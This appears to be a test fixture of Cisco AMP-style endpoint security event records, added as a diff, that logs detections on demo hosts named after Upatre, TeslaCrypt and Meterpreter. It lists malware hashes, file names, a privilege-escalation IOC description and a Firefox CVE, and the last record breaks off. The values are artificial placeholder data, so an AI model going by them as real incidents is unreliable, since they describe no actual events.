+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":931000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006660","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55808,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":900000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006659","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55807,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180341055704007000,"timestamp":1610707063,"timestamp_nanoseconds":869000000,"date":"2021-01-15T10:37:43+00:00","event_type":"DFC Threat Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180341055704006658","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55806,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1476910664322001000,"timestamp":1610706778,"timestamp_nanoseconds":322000000,"date":"2021-01-15T10:32:58+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706778,"start_date":"2021-01-15T10:32:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Meterpreter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"27:85:29:21:67:49"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A named pipe was created in a manner similar to that used for local privilege escalation through named pipe impersonation. Tools such as meterpreter often use this technique to escalate to NT Authority\\System.","short_description":"W32.PossibleNamedPipeImpersonation.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/WINDOWS/system32/cmd.exe","identity":{"sha256":"935c1861df1f4018d698e8b65abfa02d7e9037d8f68ca3c2065b6ca165d44ad2"},"parent":{"disposition":"Clean","identity":{"sha256":"69d6fff3e0a0c4d77a62b4d71e1e3a8d10d93c46782a1b05f0ec4b8919c384b9"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533671385032557000,"timestamp":1610706459,"timestamp_nanoseconds":25000000,"date":"2021-01-15T10:27:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533671385032556606","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900329000200,"timestamp":1610706298,"timestamp_nanoseconds":329000000,"date":"2021-01-15T10:24:58+00:00","event_type":"Multiple Infected Files","event_type_id":1107296258,"detection":"W32.3372C1EDAB-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706298,"start_date":"2021-01-15T10:24:58+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370"},"parent":{"disposition":"Clean","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":947000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648309","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":926000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648308","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533670191031648000,"timestamp":1610706181,"timestamp_nanoseconds":533000000,"date":"2021-01-15T10:23:01+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533670191031648307","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":15212386047828,"timestamp":1610706149,"timestamp_nanoseconds":0,"date":"2021-01-15T10:22:29+00:00","event_type":"Executed malware","event_type_id":1107296272,"detection":"W32.B1380FD95B-100.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610706149,"start_date":"2021-01-15T10:22:29+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"file:///C%3A/ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967"},"parent":{"disposition":"Clean","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":973000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643250","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":951000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643249","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669929038643000,"timestamp":1610706120,"timestamp_nanoseconds":576000000,"date":"2021-01-15T10:22:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669929038643248","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":333000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605487","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":195000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605486","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669671340605000,"timestamp":1610706060,"timestamp_nanoseconds":170000000,"date":"2021-01-15T10:21:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669671340605485","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669667045638000,"timestamp":1610706059,"timestamp_nanoseconds":779000000,"date":"2021-01-15T10:20:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669667045638188","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":15210587194928,"timestamp":1610706000,"timestamp_nanoseconds":0,"date":"2021-01-15T10:20:00+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610706000,"start_date":"2021-01-15T10:20:00+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"firefox.exe","identity":{"sha256":"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}},"vulnerabilities":[{"name":"Mozilla Firefox","version":"41.0","cve":"CVE-2015-7204","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7204"}]}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669409347600000,"timestamp":1610705999,"timestamp_nanoseconds":257000000,"date":"2021-01-15T10:19:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669409347600427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669409347600000,"timestamp":1610705999,"timestamp_nanoseconds":240000000,"date":"2021-01-15T10:19:59+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669409347600426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669405052633000,"timestamp":1610705998,"timestamp_nanoseconds":847000000,"date":"2021-01-15T10:19:58+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533669405052633129","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533669147354595000,"timestamp":1610705938,"timestamp_nanoseconds":375000000,"date":"2021-01-15T10:18:58+00:00","event_type":"Threat 